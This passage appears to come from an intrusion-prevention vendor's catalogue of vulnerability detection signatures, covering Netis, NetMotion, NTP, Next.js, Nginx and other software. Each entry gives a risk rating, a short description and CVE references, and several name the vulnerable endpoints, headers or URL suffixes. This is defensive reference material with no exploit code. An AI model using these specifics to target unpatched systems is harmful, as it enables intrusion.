Netis WF2419 wireless router could allow authenticated attackers to execute arbitrary commands due to insufficient validation of user input.

Situation:

HTTP_CRL-Netis-WF2419-Remote-Code-Execution-CVE-2019-19356

References:

CVE-2019-19356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19356

Netlink-GPON-Router-Remote-Code-Execution

About this vulnerability:	A vulnerability in Netlink GPON Router 1.0.11
Risk:	High
First detected in:	sgpkg-ips-1445-5242
Last changed:	sgpkg-ips-1445-5242
Platform:	Generic
Software:	Netlink
Type:	Input Validation
Description:	An attempt to exploit a vulnerability in Netlink GPON Router 1.0.11 detected.
Situation:	HTTP_CRL-Netlink-GPON-Router-Remote-Code-Execution

NetMechanica-NetDecision-HTTP-Server-Stack-Based-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in NetMechanica NetDecision HTTP Server detected

Risk:

High

First detected in:

sgpkg-ips-656-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

NetMechanica NetDecision

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in NetMechanica NetDecision HTTP Server, before version 4.6.1, which allows remote attackers to execute arbitrary code or cause a denial of service condition via a long URL in an HTTP request.

Situation:

HTTP_CSU-NetMechanica-NetDecision-HTTP-Server-Stack-Based-Buffer-Overflow

References:

CVE-2012-1465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1465

BID-52194
http://www.securityfocus.com/bid/52194

OSVDB-79651
http://www.osvdb.org/79651

NetMotion-Mobility-Server-MvcUtil-Java-Deserialization

About this vulnerability:

A vulnerability in NetMotion Mobility Server.

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Windows

Software:

NetMotion Mobility Server

Type:

Input Validation

Description:

A vulnerability in NetMotion Mobility Server, versions 11.x before 11.73 and 12.x before 12.02, which allows remote attackers to execute arbitrary code through the /mobility/Menu/isLoggedOn endpoint, due to a Java deserialization in the server's MvcUtil.valueStringToObject() method.

Situation:

HTTP_CS-NetMotion-Mobility-Server-MvcUtil-Java-Deserialization

References:

CVE-2021-26914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26914

NetObserve-Authentication-Bypass

About this vulnerability:

A vulnerability in NetObserve

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetObserve

Type:

Malfunction

Description:

The NetObserve software does not correctly validate whether or not a user is allowed to connect to the remote NetObserve service. Therefore a client without privileges, using a carefully crafted HTTP request, can connect to the remote service with escalated credentials.

Situation:

HTTP_CSU-NetObserve-Authentication-Bypass

References:

BID-9319
http://www.securityfocus.com/bid/9319

NetRisk-Remote-File-Inclusion

About this vulnerability:

Remote file inclusion Vulnerability in NetRisk

Risk:

High

First detected in:

sgpkg-ips-196-2032

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

NetRisk

Type:

Input Validation

Description:

There is a remote file inclusion vulnerability in NetRisk muliplayer online game written in PHP scripting language. NetRisk does not validate parameters given to the script correctly, allowing injection and execution of arbitary code into the context of the web server.

References:

CVE-2008-0144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0144

BID-27136
http://www.securityfocus.com/bid/27136

Netscape-Es-Dir-Disclosure

About this vulnerability:

Netscape Enterprise Server directory listing

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Unix

Software:

Netscape Enterprise Server

Type:

Insecure Configuration

Description:

If the Directory Indexing is enabled in Netscape Enterprise Server, a vulnerability allows for a remote attacker to list the server directories using the Web publishing (?wp-) tags.

Situation:

HTTP_CSU-Netscape-Es-Wp-Access

References:

CVE-2000-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0236

BID-1063
http://www.securityfocus.com/bid/1063

Netscape-Network-Security-Services-Library-Heap-Overflow

About this vulnerability:

Heap-based buffer overflow in Netscape NSS library

Risk:

Low

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netscape Enterprise Server;Sun ONE Web Server

Type:

Buffer Overflow

Description:

Netscape Network Security Services (NSS) library has a remote heap overflow vulnerability. This issue arises due to insufficient boundary checks for the record length field in an SSLv2 client hello message. Successful exploitation of this issue may result in denial of service or execution of arbitrary code on the system with the Web server privileges. The NSS library is commonly used by Netscape Enterprise Server and Sun One/iPlanet servers. The SSLv2 protocol is not enabled by default on these servers. Other products may be affected as well.

Situation:

HTTPS_CS-Netscape-Network-Security-Services-Library-SSLv2-Buffer-Overflow

References:

CVE-2004-0826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0826

BID-11015
http://www.securityfocus.com/bid/11015

OSVDB-10198
http://www.osvdb.org/10198

OSVDB-10199
http://www.osvdb.org/10199

Netscape-NSS-Library-SSLv2-Record-Parsing-Buffer-Overflow

About this vulnerability:	A vulnerability in Netscape NSS
Risk:	High
First detected in:	sgpkg-ips-409-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Mozilla NSS
Type:	Buffer Overflow
Description:	A vulnerability exists in Netscape Network Security Services (NSS) library's SSLv2 message parsing routines. A malformed Client Hello message with excessively large Challenge Data could overwrite a memory buffer allocated on the heap. It is possible to perform attacks, without valid credentials, on a vulnerable web server with SSLv2 support enabled that would result in a denial of service or remote code execution.
Situation:	HTTPS_CS-Netscape-NSS-Library-SSLv2-Record-Parsing-Buffer-Overflow

Netshagg

About this vulnerability:	NetShagg
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	NetShagg
Type:	Code Injection
Description:	NetShagg is a spyware that installs additional unwanted programs on the infected machine.
Situation:	HTTP_CSH-Netshagg

NetSupport-Manager-Client-Buffer-Overflow

About this vulnerability:

A vulnerability in NetSupport Manager

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Mac OS X; Solaris

Software:

NetSupport Manager

Type:

Buffer Overflow

Description:

There is a vulnerability in NetSupport Manager client daemon process. The vulnerability is due to a boundary error while handling remote handshake messages on port 5405/TCP. Remote attackers could exploit this vulnerability by sending a malicious request to the target client service. Successful exploitation would cause injection and execution of arbitrary code in the context of root user.

Situation:

Generic_CS-NetSupport-Manager-Client-Buffer-Overflow

References:

CVE-2011-0404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0404

BID-45728
http://www.securityfocus.com/bid/45728

OSVDB-70408
http://www.osvdb.org/70408

NetSupport-RAT-Infection-Traffic

About this vulnerability:	NetSupport RAT infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1360-5242
Last changed:	sgpkg-ips-1360-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	NetSupport RAT infection traffic was detected.
Situation:	HTTP_CS-NetSupport-RAT-Infection-Traffic

Netsweeper-WebAdmin-unixlogin.php-Python-Code-Injection

About this vulnerability:

A vulnerability in Netsweeper WebAdmin

Risk:

High

First detected in:

sgpkg-ips-1349-5242

Last changed:

sgpkg-ips-1349-5242

Platform:

Generic

Software:

Netsweeper WebAdmin

Type:

Input Validation

Description:

There exists a vulnerability in Netsweeper WebAdmin, versions 6.4.3 and 6.4.4, which allows remote attackers to execute arbitrary Python code through the password parameter to unixlogin.php when using specific Referer headers, due to insufficient validation of user input.

Situation:

HTTP_CS-Netsweeper-WebAdmin-unixlogin.php-Python-Code-Injection

References:

CVE-2020-13167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13167

Netwin-Dmail-Etrn-BOF

About this vulnerability:

DMail Etrn Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetWin DMail

Type:

Buffer Overflow

Description:

A remote exploitable Buffer Overflow in ETRN argument processing allows remote root compromise if successfully exploited.

Situation:

SMTP_Etrn-BO-1
SMTP_X86-ShellCode-1

References:

CVE-2000-0490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0490

BID-1297
http://www.securityfocus.com/bid/1297

Netwin-SurgeMail-IMAP-Lsub-Command-Buffer-Overflow

About this vulnerability:

Denial of service vulnerability in NetWin SurgeMail

Risk:

High

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netwin SurgeMail

Type:

Malfunction

Description:

Stack-based buffer overflow in the IMAP service in NetWin SurgeMail 38k4-4 and earlier allows remote authenticated users to execute arbitrary code via long arguments to the LSUB command.

Situation:

IMAP_CS-Netwin-SurgeMail-IMAP-Lsub-Command-Buffer-Overflow

References:

CVE-2008-1497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1497

BID-28377
http://www.securityfocus.com/bid/28377

OSVDB-43852
http://www.osvdb.org/43852

Netwin-SurgeMail-Webmail-Format-String

About this vulnerability:

Format String vulnerability in Netwin's SurgeMail Webmail interface

Risk:

High

First detected in:

sgpkg-ips-342-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netwin SurgeMail

Type:

Format String

Description:

A format string vulnerability exists in the NetWin SurgeMail 38k4 and earlier and beta 39a, and WebMail 3.1s and earlier. The Vulnerability allows remote attackers to cause a denial of service and possibly execute arbitrary code via an HTTP request to webmail.exe.

Situation:

HTTP_CSU-Netwin-SurgeMail-Webmail-Format-String

References:

CVE-2008-1055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1055

BID-27990
http://www.securityfocus.com/bid/27990

Netwin-SurgeMail-Webmail-Multiple-Header-Memory-Corruption

About this vulnerability:

Buffer overflow in Netwin's SurgeMail Webmail interface

Risk:

High

First detected in:

sgpkg-ips-341-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netwin SurgeMail

Type:

Buffer Overflow

Description:

A stack-based buffer overflow exists in the NetWin SurgeMail 38k4 and earlier, and beta 39a. The Vulnerability allows remote attackers to cause a denial of service and possibly execute arbitrary code via an HTTP request with multiple long headers to webmail.exe.

Situation:

HTTP_CS-Netwin-SurgeMail-Header-Line-BOF

References:

CVE-2008-1054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1054

BID-27992
http://www.securityfocus.com/bid/27992

NetWire-RAT-Infection-Traffic

About this vulnerability:	NetWire RAT infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1408-5242
Last changed:	sgpkg-ips-1408-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	NetWire RAT infection traffic was detected.
Situation:	Generic_CS-NetWire-RAT-Infection-Traffic

Network-Associates-PGP-Keyserver-Buffer-Overflow

About this vulnerability:

A Network Associates PGP Keyserver Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Network Associates PGP Keyserver

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Network Associates PGP Keyserver, version 7.0, which allows remote attackers to cause a denial of service condition or execute arbitrary code via exceptional BER encodings.

Situation:

LDAP_CS-Network-Associates-PGP-Keyserver-Buffer-Overflow

References:

CVE-2001-1320
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1320

BID-3046
http://www.securityfocus.com/bid/3046

OSVDB-4742
http://www.osvdb.org/4742

Network-Time-Protocol-Daemon-Configure-Buffer-Overflow

About this vulnerability:

A vulnerability in ntp.org NTP

Risk:

High

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the Network Time Protocol daemon (NTPD). The vulnerability is due to insufficient checks on an input size prior to a copy operation in the configure() function. A remote privileged attacker could exploit this vulnerability by sending a crafted NTP request to the vulnerable service. Successful exploitation could result in arbitrary code execution with the privilege level of the ntpd process.

Situation:

NTP_UDP-Network-Time-Protocol-Daemon-Configure-Buffer-Overflow

References:

CVE-2014-9295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295

BID-71761
http://www.securityfocus.com/bid/71761

OSVDB-116068
http://www.osvdb.org/116068

Network-Time-Protocol-Daemon-Control_putdata-Buffer-Overflow

About this vulnerability:

A vulnerability in ntp.org NTP

Risk:

Moderate

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the Network Time Protocol daemon (NTPD). The vulnerability is due to insufficient checks on an input size prior to a copy operation in the ctl_putdata() function. A remote privileged attacker could exploit this vulnerability by sending a crafted NTP request to the vulnerable service. Successful exploitation could result in arbitrary code execution with the privilege level of the ntpd process.

Situation:

NTP_UDP-Network-Time-Protocol-Daemon-Control_putdata-Buffer-Overflow

References:

CVE-2014-9295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295

BID-71761
http://www.securityfocus.com/bid/71761

OSVDB-116067
http://www.osvdb.org/116067

Network-Time-Protocol-Daemon-Crypto-nak-Authentication-Bypass

About this vulnerability:

A vulnerability in NTP

Risk:

High

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Malfunction

Description:

There exists an authentication bypass vulnerability in the Network Time Protocol daemon (NTPD). A remote attacker can use this to modify the time on the target system, which can lead to several exploitations including policy bypass.

Situation:

NTP_UDP-Network-Time-Protocol-Daemon-Crypto-nak-Authentication-Bypass

References:

CVE-2015-7871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871

Network-Time-Protocol-Daemon-Crypto-nak-Denial-Of-Service

About this vulnerability:

A vulnerability in ntp.org NTP

Risk:

Moderate

First detected in:

sgpkg-ips-773-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Malfunction

Description:

A vulnerability in the Network Time Protocol daemon (NTPD), versions 4.2.8p7 and 4.3.92, which allows remote attackers to cause a denial of service condition, due to a null pointer dereference when handling crypto-NAK packets.

Situation:

NTP_UDP-Network-Time-Protocol-Daemon-Crypto-nak-Authentication-Bypass

References:

CVE-2016-4957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4957

Network-Time-Protocol-Daemon-Decodenetnum-Assertion-Failure

About this vulnerability:

A vulnerability in ntp.org NTP

Risk:

Moderate

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Malfunction

Description:

The Network Time Protocol daemon can be exploited in a way that leads to a denial of service condition by sending crafted packets.

Situation:

NTP_UDP-Network-Time-Protocol-Daemon-Decodenetnum-Assertion-Failure

References:

CVE-2015-7855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855

Network-Time-Protocol-Daemon-Peer_xmit-Mode-Denial-Of-Service

About this vulnerability:

A vulnerability in ntp.org NTP

Risk:

Moderate

First detected in:

sgpkg-ips-869-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Malfunction

Description:

Insufficient input validation on the mode parameter in peer_xmit() causes a vulnerability in ntp.org NTPd. A successful exploit can cause a denial of service condition.

Situation:

NTP_UDP-Network-Time-Protocol-Daemon-Peer_xmit-Mode-Denial-Of-Service

References:

CVE-2017-6464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6464

Network-Time-Protocol-Daemon-Pidfile-Driftfile-Arbitrary-File-Overwrite

About this vulnerability:

A vulnerability in ntp.org NTP

Risk:

Moderate

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Malfunction

Description:

A vulnerability in the ntp.org NTP daemon allows an attacker to aribtrarily overwrite files on the server.

Situation:

NTP_UDP-Network-Time-Protocol-Daemon-Pidfile-Driftfile-Arbitrary-File-Overwrite

References:

CVE-2015-7703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703

Network-Time-Protocol-Daemon-Read_Mru_List-Denial-Of-Service

About this vulnerability:

A vulnerability in ntp.org NTP

Risk:

Moderate

First detected in:

sgpkg-ips-825-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Malfunction

Description:

A denial of service condition can be caused by sending the ntp.org NTPD a crafted packet containing an improperly formatted control message.

Situation:

NTP_UDP-Network-Time-Protocol-Daemon-Read_Mru_List-Denial-Of-Service

References:

CVE-2016-7434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7434

Network-Time-Protocol-Ntpq-Decodearr-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in ntp.org NTP

Risk:

High

First detected in:

sgpkg-ips-1121-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ntpd

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been reported in the monitoring and control program ntpq of Network Time Protocol daemon. The vulnerability is due to insufficient validation of an array returned by ntpd server. A remote attacker could exploit this vulnerability by sending a crafted NTP response to a target user. Successful exploitation could result in arbitrary code execution in the security context of the user.

Situation:

NTP_UDP-Network-Time-Protocol-Ntpq-Decodearr-Stack-Based-Buffer-Overflow

References:

CVE-2018-7183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7183

New.Net-Toolbar

About this vulnerability:	New.Net Internet Explorer Toolbar
Risk:	Low
First detected in:	sgpkg-ips-35-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	New.Net Toolbar
Type:	Misconfiguration
Description:	New.Net is a toolbar for Internet Explorer. Some organizations may consider this unwanted software.
Situation:	HTTP_CSH-New.Net-Toolbar-Activity

Newdotnet

About this vulnerability:	NewDotNet
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	NewDotNet
Type:	Misconfiguration
Description:	NewDotNet is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Newdotnet

Newsdesk-Cgi-File-Disclosure

About this vulnerability:

Newsdesk.cgi file disclosure vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

News Desk

Type:

Input Validation

Description:

News Desk 1.2 contains a vulnerable newsdesk.cgi script that can be exploited to view any file on the system and the contents of any directory on the system using the Web server privileges.

References:

CVE-2001-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0232

NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow

About this vulnerability:

A vulnerability in NewsGator FeedDemon

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

NewsGator FeedDemon

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in NewsGator FeedDemon. The application fails to sanitize user supplied input leading to a buffer overflow condition. A successful exploitation may lead to code execution in the context of the current user.

Situation:

HTTP_SS-NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow
File-TextId_NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow

References:

CVE-2009-0546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0546

BID-33630
http://www.securityfocus.com/bid/33630

OSVDB-51753
http://www.osvdb.org/51753

Next.js-Middleware-Security-Control-Bypass-CVE-2025-29927

About this vulnerability:

A vulnerability in Next.js

Risk:

High

First detected in:

sgpkg-ips-1855-5242

Last changed:

sgpkg-ips-1855-5242

Platform:

Generic

Software:

Vercel Next.js

Type:

Malfunction

Description:

A vulnerability in Next.js middleware allows bypassing authentication requirements via a crafted x-middleware-subrequest HTTP header.

Situation:

HTTP_CSH-Next.js-Possible-Middleware-Security-Control-Bypass-CVE-2025-29927
HTTP_CSH-Next.js-Middleware-Security-Control-Bypass-CVE-2025-29927

References:

CVE-2025-29927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29927

Nexus-Repository-Manager-Java-EL-Injection

About this vulnerability:

A vulnerability in Nexus Repository Manager

Risk:

High

First detected in:

sgpkg-ips-1248-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Sonatype Nexus Repository Manager

Type:

Input Validation

Description:

There exists a vulnerability in Nexus Repository Manager, version 3.21.1 and before, which allows remote attackers to exexute arbitrary code by injecting arbitrary Java Expression Language (EL) expressions.

Situation:

HTTP_CRL-Nexus-Repository-Manager-Java-EL-Injection

References:

CVE-2020-10199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10199

NFS-utils-TCP-Connection-Termination-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux NFS Project nfs-utils

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

linux NFS utils

Type:

Malfunction

Description:

There is a vulnerability in the statd daemon of the nfs-utils package. The daemon does not correctly handle the exception condition of an unexpected connection termination. If an attacker can terminate a network connection to statd at a certain phase, it is possible to create a denial of service condition with the termination of the statd daemon. The loss of statd disables NFS lock recovery. Under some circumstances, this may affect access to files on NFS systems or the integrity of files on NFS systems. The vulnerable application will terminate unexpectedly in the event of a successful attack. As the affected daemon is a part of the Network File System (NFS), the NFS functionality will be affected as a result. The statd daemon is used by the lockd daemon for lock recovery. Without lock recovery, abnormal system termination may result in file locking issues as described in section 4.1 "Technical Mechanisms". Note that file locking problems do not occur as a result of the termination of statd. A second condition is required. Namely, an NFS server or client, during the time after the crash of the statd daemon, continues to use the NFS file locking functionality. Subsequently, the server or client terminates unexpectedly while there are active file locks being used by the client (or clients in the case of a server termination).

Situation:

Generic_CS-NFS-utils-TCP-Connection-Termination-Denial-Of-Service

References:

CVE-2004-1014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1014

BID-11785
http://www.securityfocus.com/bid/11785

Nginx-0-Length-Headers-Leak-Denial-Of-Service

About this vulnerability:

A vulnerability in nginx HTTP Server

Risk:

High

First detected in:

sgpkg-ips-1248-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

nginx

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in Nginx. The vulnerability is due to resource exhaustion that occurs when an attacker sends a stream of headers with a 0-length header name and 0-length header value, optionally Huffman encoded into 1-byte or greater headers. A remote unauthenticated attacker can exploit this vulnerability by sending a flood of crafted HTTP2 HEADERS and/or CONTINUATION frames. Successful exploitation could cause a denial of service conditions on the target system.

Situation:

HTTP_CSH-Nginx-0-Length-Headers-Leak-Denial-Of-Service

References:

CVE-2019-9516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9516

Nginx-Chunked-Encoding-Buffer-Overflow

About this vulnerability:

A vulnerability in nginx HTTP Server

Risk:

High

First detected in:

sgpkg-ips-523-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

nginx

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been reported in Nginx. The vulnerability is due to insufficient validation of chunked-encoding HTTP requests in the ngx_http_parse_chunked() function. A remote attacker can exploit this vulnerability to execute arbitrary code in the context of the affected service. If code execution is unsuccessful, a denial of service condition may result.

Situation:

HTTP_CCH-Apache-And-Nginx-Multiple-Chunked-Encoding-Vulnerabilities

References:

CVE-2013-2028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2028

OSVDB-93037
http://www.osvdb.org/93037

Nginx-Chunked-Transfer-Parsing-Denial-Of-Service

About this vulnerability:

A vulnerability in nginx HTTP Server

Risk:

High

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

nginx

Type:

Input Validation

Description:

An denial of service vulnerability exists in Nginx. The vulnerability is due to an error while parsing chunked transfer encoded request or response bodies inside ngx_http_parse_chunked(). A remote attacker can exploit this vulnerability by sending a malicious request or response to the vulnerable server to disclose worker process memory or cause a denial-of-service condition on the server.

Situation:

HTTP_CCH-Apache-And-Nginx-Multiple-Chunked-Encoding-Vulnerabilities
HTTP_SCH-Microsoft-HTTP-Services-And-Nginx-Chunked-Encoding-Vulnerabilities

References:

CVE-2013-2070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2070

BID-59824
http://www.securityfocus.com/bid/59824

OSVDB-93282
http://www.osvdb.org/93282

Nginx-DNS-Resolver-Denial-Of-Service

About this vulnerability:

A vulnerability in nginx HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-729-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

nginx

Type:

Malfunction

Description:

A denial of service condition may be caused by exploiting a vulnerability in the nginx web server. A crafted DNS response may cause an invalid pointer dereference which causes the daemon to trust an untrusted response.

Situation:

DNS-UDP_Nginx-DNS-Resolver-Denial-Of-Service

References:

CVE-2016-0742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0742

Nginx-DNS-Resolver-Off-By-One-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Nginx DNS Resolver.

Risk:

High

First detected in:

sgpkg-ips-1370-5242

Last changed:

sgpkg-ips-1370-5242

Platform:

Generic

Software:

nginx

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability in Nginx DNS Resolver, HTTP Server 0.6.18 through 1.20.0, which allows remote attackers to cause a denial of service condition and likely execute remote code by sending specially crafted packets to the target server, due to an off-by-one error in the ngx_resolver_copy() function.

Situation:

DNS-UDP_Nginx-DNS-Resolver-Off-By-One-Heap-Buffer-Overflow

References:

CVE-2021-23017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23017

Nginx-Location-NTFS-Extended-Attributes-Security-Bypass

About this vulnerability:

A vulnerability in nginx HTTP Server for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-488-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

nginx

Type:

Malfunction

Description:

A security bypass vulnerability has been reported in Nginx. The vulnerability is due to an error when resources defined by the "location" directive are accessed via an HTTP request containing directory names with NTFS extended attributes. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to a vulnerable instance of Nginx. This can result in disclosure of sensitive information.

Situation:

HTTP_CRL-Nginx-Location-NTFS-Extended-Attributes-Security-Bypass

References:

CVE-2011-4963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4963

OSVDB-84339
http://www.osvdb.org/84339

Nginx-Remote-Source-Code-Disclosure

About this vulnerability:

An Nginx Remote Source Code Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-721-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

nginx

Type:

Insecure Configuration

Description:

A vulnerability in Nginx, versions 0.8 before 0.8.40 and 0.7 before 0.7.66, which allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URL.

Situation:

HTTP_CRL-Nginx-Remote-Source-Code-Disclosure

References:

CVE-2010-2263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2263

BID-40760
http://www.securityfocus.com/bid/40760

OSVDB-65531
http://www.osvdb.org/65531

Nginx-Request-URI-Verification-Security-Bypass

About this vulnerability:

A vulnerability in nginx HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-553-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

nginx

Type:

Input Validation

Description:

There is a security bypass vulnerability in Nginx. The vulnerability is caused by improper handling of unescaped space characters within URIs. A remote attacker can exploit this vulnerability to bypass security restrictions in certain configurations.

Situation:

HTTP_CSU-Nginx-Request-URI-Verification-Security-Bypass

References:

CVE-2013-4547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4547

OSVDB-100015
http://www.osvdb.org/100015

Nginx-Unit-Router-Process-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Nginx Unit

Risk:

High

First detected in:

sgpkg-ips-1144-5242

Last changed:

sgpkg-ips-1584-5242

Platform:

Generic

Software:

nginx

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability in Nginx Unit, versions 0.3 through 1.7, which allows remote attcakers to cause a denial of service condition, due to the insufficient validation of requests within the router process in the nxt_http_request.c file.

References:

CVE-2019-7401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7401

Nginx-URI-Parsing-Buffer-Underflow

About this vulnerability:

A vulnerability in nginx HTTP Server

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

nginx

Type:

Buffer Overflow

Description:

There is a remote buffer underflow vulnerability in nginx HTTP server. The vulnerability is due to an error when processing malicious HTTP requests. A remote attacker can exploit this vulnerability by sending an HTTP request containing a specially crafted URI to the target system. Successful exploitation of this vulnerability can lead to arbitrary code execution in the security context of the affected service. An unsuccessful code execution attempt can lead to abnormal termination of the vulnerable program.

Situation:

HTTP_CSU-Nginx-URI-Parsing-Buffer-Underflow

References:

CVE-2009-2629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2629

BID-36384
http://www.securityfocus.com/bid/36384

NginxProxyManager-Proxy-Host-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in NginxProxyManager

Risk:

Moderate

First detected in:

sgpkg-ips-1457-5242

Last changed:

sgpkg-ips-1457-5242

Platform:

Generic

Software:

NginxProxyManager

Type:

Input Validation

Description:

